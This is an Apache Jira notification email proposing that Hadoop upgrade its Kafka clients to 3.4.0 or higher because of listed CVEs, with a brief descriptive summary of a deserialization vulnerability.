Rohit Kumar created HADOOP-19168:
------------------------------------
Summary: Upgrade Kafka Clients due to CVEs
Key: HADOOP-19168
URL: https://issues.apache.org/jira/browse/HADOOP-19168
Project: Hadoop Common
Issue Type: Task
Reporter: Rohit Kumar
Upgrade Kafka Clients due to CVEs
CVE-2023-25194:- Affected versions of this package are vulnerable to
Deserialization of Untrusted Data when there are gadgets in the
{{{}classpath{}}}. The server will connect to the attacker's LDAP server and
deserialize the LDAP response, which the attacker can use to execute java
deserialization gadget chains on the Kafka connect server.
CVSS Score:- 8.8(High)
[https://nvd.nist.gov/vuln/detail/CVE-2023-25194]
CVE-2021-38153
CVE-2018-17196
Insufficient Entropy
[https://security.snyk.io/package/maven/org.apache.kafka:kafka-clients]
Upgrade Kafka-Clients to 3.4.0 or higher.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
